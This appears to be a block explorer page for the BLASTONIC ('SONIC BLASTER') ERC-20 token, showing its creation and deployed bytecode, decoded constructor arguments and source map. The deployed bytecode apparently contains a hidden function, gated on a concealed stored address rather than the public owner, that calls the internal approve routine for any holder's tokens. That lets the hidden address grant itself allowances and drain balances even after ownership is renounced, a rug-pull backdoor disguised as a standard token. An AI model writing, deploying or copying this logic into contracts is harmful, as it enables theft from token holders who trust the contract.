fffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ade9190610eaa565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b3d578060035f828254610b3191906110ff565b92505081905550610c0d565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610bc7578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bbe9392919061109d565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c54578060035f8282540392505081905550610c9f565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cfc9190610eaa565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610d4b82610d09565b610d558185610d13565b9350610d65818560208601610d23565b610d6e81610d31565b840191505092915050565b5f6020820190508181035f830152610d918184610d41565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610dc682610d9d565b9050919050565b610dd681610dbc565b8114610de0575f5ffd5b50565b5f81359050610df181610dcd565b92915050565b5f819050919050565b610e0981610df7565b8114610e13575f5ffd5b50565b5f81359050610e2481610e00565b92915050565b5f5f60408385031215610e4057610e3f610d99565b5b5f610e4d85828601610de3565b9250506020610e5e85828601610e16565b9150509250929050565b5f8115159050919050565b610e7c81610e68565b82525050565b5f602082019050610e955f830184610e73565b92915050565b610ea481610df7565b82525050565b5f602082019050610ebd5f830184610e9b565b92915050565b5f5f5f60608486031215610eda57610ed9610d99565b5b5f610ee786828701610de3565b9350506020610ef886828701610de3565b9250506040610f0986828701610e16565b9150509250925092565b5f60ff82169050919050565b610f2881610f13565b82525050565b5f602082019050610f415f830184610f1f565b92915050565b5f60208284031215610f5c57610f5b610d99565b5b5f610f6984828501610de3565b91505092915050565b610f7b81610dbc565b82525050565b5f602082019050610f945f830184610f72565b92915050565b5f5f60408385031215610fb057610faf610d99565b5b5f610fbd85828601610de3565b9250506020610fce85828601610de3565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061101c57607f821691505b60208210810361102f5761102e610fd8565b5b50919050565b7f6e6f74206f776e657200000000000000000000000000000000000000000000005f82015250565b5f611069600983610d13565b915061107482611035565b602082019050919050565b5f6020820190508181035f8301526110968161105d565b9050919050565b5f6060820190506110b05f830186610f72565b6110bd6020830185610e9b565b6110ca6040830184610e9b565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61110982610df7565b915061111483610df7565b925082820190508082111561112c5761112b6110d2565b5b9291505056fea2646970667358221220a8d163fd5c5d7d505949b441388f90e73aa0697aef2d0db116a7012bde36e13564736f6c634300081c0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000004c4b400000000000000000000000000000000000000000000000000000000000000009000000000000000000000000000000000000000000000000000000000000000d534f4e494320424c4153544552000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009424c4153544f4e49430000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561000f575f5ffd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f578063186477441461013d57806323b872dd1461016d578063313ce5671461019d575b5f5ffd5b6100d96102ad565b6040516100e69190610d79565b60405180910390f35b61010960048036038101906101049190610e2a565b61033d565b6040516101169190610e82565b60405180910390f35b61012761035f565b6040516101349190610eaa565b60405180910390f35b61015760048036038101906101529190610ec3565b610368565b6040516101649190610e82565b60405180910390f35b61018760048036038101906101829190610ec3565b6103cd565b6040516101949190610e82565b60405180910390f35b6101a56103fb565b6040516101b29190610f2e565b60405180910390f35b6101d560048036038101906101d09190610f47565b610403565b6040516101e29190610eaa565b60405180910390f35b6101f3610449565b005b6101fd61045c565b60405161020a9190610f81565b60405180910390f35b61021b610483565b6040516102289190610d79565b60405180910390f35b61024b60048036038101906102469190610e2a565b610513565b6040516102589190610e82565b60405180910390f35b61027b60048036038101906102769190610f9a565b610535565b6040516102889190610eaa565b60405180910390f35b6102ab60048036038101906102a69190610f47565b6105b7565b005b6060600480546102bc90611005565b80601f01602080910402602001604051908101604052809291908181526020018280546102e890611005565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f5f61034761063b565b9050610354818585610642565b600191505092915050565b5f600354905090565b5f5f5f60065490503381149150816103b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ac9061107f565b60405180910390fd5b6103c0868686610642565b6001925050509392505050565b5f5f6103d761063b565b90506103e4858285610654565b6103ef8585856106e6565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104516107d6565b61045a5f61085d565b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461049290611005565b80601f01602080910402602001604051908101604052809291908181526020018280546104be90611005565b80156105095780601f106104e057610100808354040283529160200191610509565b820191905f5260205f20905b8154815290600101906020018083116104ec57829003601f168201915b5050505050905090565b5f5f61051d61063b565b905061052a8185856106e6565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105bf6107d6565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361062f575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106269190610f81565b60405180910390fd5b6106388161085d565b50565b5f33905090565b61064f838383600161091e565b505050565b5f61065f8484610535565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106e057818110156106d1578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106c89392919061109d565b60405180910390fd5b6106df84848484035f61091e565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610756575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161074d9190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c6575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107bd9190610f81565b60405180910390fd5b6107d1838383610aed565b505050565b6107de61063b565b73ffffffffffffffffffffffffffffffffffffffff166107fc61045c565b73ffffffffffffffffffffffffffffffffffffffff161461085b5761081f61063b565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108529190610f81565b60405180910390fd5b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361098e575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109859190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109fe575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109f59190610f81565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610ae7578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610ade9190610eaa565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b3d578060035f828254610b3191906110ff565b92505081905550610c0d565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610bc7578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bbe9392919061109d565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c54578060035f8282540392505081905550610c9f565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cfc9190610eaa565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f610d4b82610d09565b610d558185610d13565b9350610d65818560208601610d23565b610d6e81610d31565b840191505092915050565b5f6020820190508181035f830152610d918184610d41565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610dc682610d9d565b9050919050565b610dd681610dbc565b8114610de0575f5ffd5b50565b5f81359050610df181610dcd565b92915050565b5f819050919050565b610e0981610df7565b8114610e13575f5ffd5b50565b5f81359050610e2481610e00565b92915050565b5f5f60408385031215610e4057610e3f610d99565b5b5f610e4d85828601610de3565b9250506020610e5e85828601610e16565b9150509250929050565b5f8115159050919050565b610e7c81610e68565b82525050565b5f602082019050610e955f830184610e73565b92915050565b610ea481610df7565b82525050565b5f602082019050610ebd5f830184610e9b565b92915050565b5f5f5f60608486031215610eda57610ed9610d99565b5b5f610ee786828701610de3565b9350506020610ef886828701610de3565b9250506040610f0986828701610e16565b9150509250925092565b5f60ff82169050919050565b610f2881610f13565b82525050565b5f602082019050610f415f830184610f1f565b92915050565b5f60208284031215610f5c57610f5b610d99565b5b5f610f6984828501610de3565b91505092915050565b610f7b81610dbc565b82525050565b5f602082019050610f945f830184610f72565b92915050565b5f5f60408385031215610fb057610faf610d99565b5b5f610fbd85828601610de3565b9250506020610fce85828601610de3565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061101c57607f821691505b60208210810361102f5761102e610fd8565b5b50919050565b7f6e6f74206f776e657200000000000000000000000000000000000000000000005f82015250565b5f611069600983610d13565b915061107482611035565b602082019050919050565b5f6020820190508181035f8301526110968161105d565b9050919050565b5f6060820190506110b05f830186610f72565b6110bd6020830185610e9b565b6110ca6040830184610e9b565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61110982610df7565b915061111483610df7565b925082820190508082111561112c5761112b6110d2565b5b9291505056fea2646970667358221220a8d163fd5c5d7d505949b441388f90e73aa0697aef2d0db116a7012bde36e13564736f6c634300081c0033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000004c4b400000000000000000000000000000000000000000000000000000000000000009000000000000000000000000000000000000000000000000000000000000000d534f4e494320424c4153544552000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009424c4153544f4e49430000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : symbol_ (string): SONIC BLASTER
Arg [1] : name_ (string): BLASTONIC
Arg [2] : totalSupply_ (uint256): 5000000
Arg [3] : decimals_ (uint256): 9

-----Encoded View---------------
8 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000c0
Arg [2] : 00000000000000000000000000000000000000000000000000000000004c4b40
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [4] : 000000000000000000000000000000000000000000000000000000000000000d
Arg [5] : 534f4e494320424c415354455200000000000000000000000000000000000000
Arg [6] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [7] : 424c4153544f4e49430000000000000000000000000000000000000000000000


Deployed Bytecode Sourcemap

20142:420:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9356:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11649:190;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10458:99;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13246:310;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12417:249;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20466:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10620:118;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7046:103;;;:::i;:::-;;6777:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9566:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10943:182;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11188:142;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7157:220;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9356:91;9401:13;9434:5;9427:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9356:91;:::o;11649:190::-;11722:4;11739:13;11755:12;:10;:12::i;:::-;11739:28;;11778:31;11787:5;11794:7;11803:5;11778:8;:31::i;:::-;11827:4;11820:11;;;11649:190;;;;:::o;10458:99::-;10510:7;10537:12;;10530:19;;10458:99;:::o;13246:310::-;13333:4;13350:10;13371:11;13385:13;;13371:27;;13437:8;13432:3;13429:17;13420:26;;13465:5;13457:27;;;;;;;;;;;;:::i;:::-;;;;;;;;;13495:31;13504:5;13511:7;13520:5;13495:8;:31::i;:::-;13544:4;13537:11;;;;13246:310;;;;;:::o;12417:249::-;12504:4;12521:15;12539:12;:10;:12::i;:::-;12521:30;;12562:37;12578:4;12584:7;12593:5;12562:15;:37::i;:::-;12610:26;12620:4;12626:2;12630:5;12610:9;:26::i;:::-;12654:4;12647:11;;;12417:249;;;;;:::o;20466:93::-;20524:5;20549:2;20542:9;;20466:93;:::o;10620:118::-;10685:7;10712:9;:18;10722:7;10712:18;;;;;;;;;;;;;;;;10705:25;;10620:118;;;:::o;7046:103::-;6736:13;:11;:13::i;:::-;7111:30:::1;7138:1;7111:18;:30::i;:::-;7046:103::o:0;6777:87::-;6823:7;6850:6;;;;;;;;;;;6843:13;;6777:87;:::o;9566:95::-;9613:13;9646:7;9639:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9566:95;:::o;10943:182::-;11012:4;11029:13;11045:12;:10;:12::i;:::-;11029:28;;11068:27;11078:5;11085:2;11089:5;11068:9;:27::i;:::-;11113:4;11106:11;;;10943:182;;;;:::o;11188:142::-;11268:7;11295:11;:18;11307:5;11295:18;;;;;;;;;;;;;;;:27;11314:7;11295:27;;;;;;;;;;;;;;;;11288:34;;11188:142;;;;:::o;7157:220::-;6736:13;:11;:13::i;:::-;7262:1:::1;7242:22;;:8;:22;;::::0;7238:93:::1;;7316:1;7288:31;;;;;;;;;;;:::i;:::-;;;;;;;;7238:93;7341:28;7360:8;7341:18;:28::i;:::-;7157:220:::0;:::o;3959:98::-;4012:7;4039:10;4032:17;;3959:98;:::o;17366:130::-;17451:37;17460:5;17467:7;17476:5;17483:4;17451:8;:37::i;:::-;17366:130;;;:::o;19648:487::-;19748:24;19775:25;19785:5;19792:7;19775:9;:25::i;:::-;19748:52;;19835:17;19815:16;:37;19811:317;;19892:5;19873:16;:24;19869:132;;;19952:7;19961:16;19979:5;19925:60;;;;;;;;;;;;;:::i;:::-;;;;;;;;19869:132;20044:57;20053:5;20060:7;20088:5;20069:16;:24;20095:5;20044:8;:57::i;:::-;19811:317;19737:398;19648:487;;;:::o;13941:308::-;14041:1;14025:18;;:4;:18;;;14021:88;;14094:1;14067:30;;;;;;;;;;;:::i;:::-;;;;;;;;14021:88;14137:1;14123:16;;:2;:16;;;14119:88;;14192:1;14163:32;;;;;;;;;;;:::i;:::-;;;;;;;;14119:88;14217:24;14225:4;14231:2;14235:5;14217:7;:24::i;:::-;13941:308;;;:::o;6872:166::-;6943:12;:10;:12::i;:::-;6932:23;;:7;:5;:7::i;:::-;:23;;;6928:103;;7006:12;:10;:12::i;:::-;6979:40;;;;;;;;;;;:::i;:::-;;;;;;;;6928:103;6872:166::o;7385:191::-;7459:16;7478:6;;;;;;;;;;;7459:25;;7504:8;7495:6;;:17;;;;;;;;;;;;;;;;;;7559:8;7528:40;;7549:8;7528:40;;;;;;;;;;;;7448:128;7385:191;:::o;18913:443::-;19043:1;19026:19;;:5;:19;;;19022:91;;19098:1;19069:32;;;;;;;;;;;:::i;:::-;;;;;;;;19022:91;19146:1;19127:21;;:7;:21;;;19123:92;;19200:1;19172:31;;;;;;;;;;;:::i;:::-;;;;;;;;19123:92;19255:5;19225:11;:18;19237:5;19225:18;;;;;;;;;;;;;;;:27;19244:7;19225:27;;;;;;;;;;;;;;;:35;;;;19275:9;19271:78;;;19322:7;19306:31;;19315:5;19306:31;;;19331:5;19306:31;;;;;;:::i;:::-;;;;;;;;19271:78;18913:443;;;;:::o;14573:1135::-;14679:1;14663:18;;:4;:18;;;14659:552;;14817:5;14801:12;;:21;;;;;;;:::i;:::-;;;;;;;;14659:552;;;14855:19;14877:9;:15;14887:4;14877:15;;;;;;;;;;;;;;;;14855:37;;14925:5;14911:11;:19;14907:117;;;14983:4;14989:11;15002:5;14958:50;;;;;;;;;;;;;:::i;:::-;;;;;;;;14907:117;15179:5;15165:11;:19;15147:9;:15;15157:4;15147:15;;;;;;;;;;;;;;;:37;;;;14840:371;14659:552;15241:1;15227:16;;:2;:16;;;15223:435;;15409:5;15393:12;;:21;;;;;;;;;;;15223:435;;;15626:5;15609:9;:13;15619:2;15609:13;;;;;;;;;;;;;;;;:22;;;;;;;;;;;15223:435;15690:2;15675:25;;15684:4;15675:25;;;15694:5;15675:25;;;;;;:::i;:::-;;;;;;;;14573:1135;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:139::-;376:6;371:3;366;360:23;417:1;408:6;403:3;399:16;392:27;287:139;;;:::o;432:102::-;473:6;524:2;520:7;515:2;508:5;504:14;500:28;490:38;;432:102;;;:::o;540:377::-;628:3;656:39;689:5;656:39;:::i;:::-;711:71;775:6;770:3;711:71;:::i;:::-;704:78;;791:65;849:6;844:3;837:4;830:5;826:16;791:65;:::i;:::-;881:29;903:6;881:29;:::i;:::-;876:3;872:39;865:46;;632:285;540:377;;;;:::o;923:313::-;1036:4;1074:2;1063:9;1059:18;1051:26;;1123:9;1117:4;1113:20;1109:1;1098:9;1094:17;1087:47;1151:78;1224:4;1215:6;1151:78;:::i;:::-;1143:86;;923:313;;;;:::o;1323:117::-;1432:1;1429;1422:12;1569:126;1606:7;1646:42;1639:5;1635:54;1624:65;;1569:126;;;:::o;1701:96::-;1738:7;1767:24;1785:5;1767:24;:::i;:::-;1756:35;;1701:96;;;:::o;1803:122::-;1876:24;1894:5;1876:24;:::i;:::-;1869:5;1866:35;1856:63;;1915:1;1912;1905:12;1856:63;1803:122;:::o;1931:139::-;1977:5;2015:6;2002:20;1993:29;;2031:33;2058:5;2031:33;:::i;:::-;1931:139;;;;:::o;2076:77::-;2113:7;2142:5;2131:16;;2076:77;;;:::o;2159:122::-;2232:24;2250:5;2232:24;:::i;:::-;2225:5;2222:35;2212:63;;2271:1;2268;2261:12;2212:63;2159:122;:::o;2287:139::-;2333:5;2371:6;2358:20;2349:29;;2387:33;2414:5;2387:33;:::i;:::-;2287:139;;;;:::o;2432:474::-;2500:6;2508;2557:2;2545:9;2536:7;2532:23;2528:32;2525:119;;;2563:79;;:::i;:::-;2525:119;2683:1;2708:53;2753:7;2744:6;2733:9;2729:22;2708:53;:::i;:::-;2698:63;;2654:117;2810:2;2836:53;2881:7;2872:6;2861:9;2857:22;2836:53;:::i;:::-;2826:63;;2781:118;2432:474;;;;;:::o;2912:90::-;2946:7;2989:5;2982:13;2975:21;2964:32;;2912:90;;;:::o;3008:109::-;3089:21;3104:5;3089:21;:::i;:::-;3084:3;3077:34;3008:109;;:::o;3123:210::-;3210:4;3248:2;3237:9;3233:18;3225:26;;3261:65;3323:1;3312:9;3308:17;3299:6;3261:65;:::i;:::-;3123:210;;;;:::o;3339:118::-;3426:24;3444:5;3426:24;:::i;:::-;3421:3;3414:37;3339:118;;:::o;3463:222::-;3556:4;3594:2;3583:9;3579:18;3571:26;;3607:71;3675:1;3664:9;3660:17;3651:6;3607:71;:::i;:::-;3463:222;;;;:::o;3691:619::-;3768:6;3776;3784;3833:2;3821:9;3812:7;3808:23;3804:32;3801:119;;;3839:79;;:::i;:::-;3801:119;3959:1;3984:53;4029:7;4020:6;4009:9;4005:22;3984:53;:::i;:::-;3974:63;;3930:117;4086:2;4112:53;4157:7;4148:6;4137:9;4133:22;4112:53;:::i;:::-;4102:63;;4057:118;4214:2;4240:53;4285:7;4276:6;4265:9;4261:22;4240:53;:::i;:::-;4230:63;;4185:118;3691:619;;;;;:::o;4316:86::-;4351:7;4391:4;4384:5;4380:16;4369:27;;4316:86;;;:::o;4408:112::-;4491:22;4507:5;4491:22;:::i;:::-;4486:3;4479:35;4408:112;;:::o;4526:214::-;4615:4;4653:2;4642:9;4638:18;4630:26;;4666:67;4730:1;4719:9;4715:17;4706:6;4666:67;:::i;:::-;4526:214;;;;:::o;4746:329::-;4805:6;4854:2;4842:9;4833:7;4829:23;4825:32;4822:119;;;4860:79;;:::i;:::-;4822:119;4980:1;5005:53;5050:7;5041:6;5030:9;5026:22;5005:53;:::i;:::-;4995:63;;4951:117;4746:329;;;;:::o;5081:118::-;5168:24;5186:5;5168:24;:::i;:::-;5163:3;5156:37;5081:118;;:::o;5205:222::-;5298:4;5336:2;5325:9;5321:18;5313:26;;5349:71;5417:1;5406:9;5402:17;5393:6;5349:71;:::i;:::-;5205:222;;;;:::o;5433:474::-;5501:6;5509;5558:2;5546:9;5537:7;5533:23;5529:32;5526:119;;;5564:79;;:::i;:::-;5526:119;5684:1;5709:53;5754:7;5745:6;5734:9;5730:22;5709:53;:::i;:::-;5699:63;;5655:117;5811:2;5837:53;5882:7;5873:6;5862:9;5858:22;5837:53;:::i;:::-;5827:63;;5782:118;5433:474;;;;;:::o;5913:180::-;5961:77;5958:1;5951:88;6058:4;6055:1;6048:15;6082:4;6079:1;6072:15;6099:320;6143:6;6180:1;6174:4;6170:12;6160:22;;6227:1;6221:4;6217:12;6248:18;6238:81;;6304:4;6296:6;6292:17;6282:27;;6238:81;6366:2;6358:6;6355:14;6335:18;6332:38;6329:84;;6385:18;;:::i;:::-;6329:84;6150:269;6099:320;;;:::o;6425:159::-;6565:11;6561:1;6553:6;6549:14;6542:35;6425:159;:::o;6590:365::-;6732:3;6753:66;6817:1;6812:3;6753:66;:::i;:::-;6746:73;;6828:93;6917:3;6828:93;:::i;:::-;6946:2;6941:3;6937:12;6930:19;;6590:365;;;:::o;6961:419::-;7127:4;7165:2;7154:9;7150:18;7142:26;;7214:9;7208:4;7204:20;7200:1;7189:9;7185:17;7178:47;7242:131;7368:4;7242:131;:::i;:::-;7234:139;;6961:419;;;:::o;7386:442::-;7535:4;7573:2;7562:9;7558:18;7550:26;;7586:71;7654:1;7643:9;7639:17;7630:6;7586:71;:::i;:::-;7667:72;7735:2;7724:9;7720:18;7711:6;7667:72;:::i;:::-;7749;7817:2;7806:9;7802:18;7793:6;7749:72;:::i;:::-;7386:442;;;;;;:::o;7834:180::-;7882:77;7879:1;7872:88;7979:4;7976:1;7969:15;8003:4;8000:1;7993:15;8020:191;8060:3;8079:20;8097:1;8079:20;:::i;:::-;8074:25;;8113:20;8131:1;8113:20;:::i;:::-;8108:25;;8156:1;8153;8149:9;8142:16;;8177:3;8174:1;8171:10;8168:36;;;8184:18;;:::i;:::-;8168:36;8020:191;;;;:::o

Swarm Source

ipfs://a8d163fd5c5d7d505949b441388f90e73aa0697aef2d0db116a7012bde36e135
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.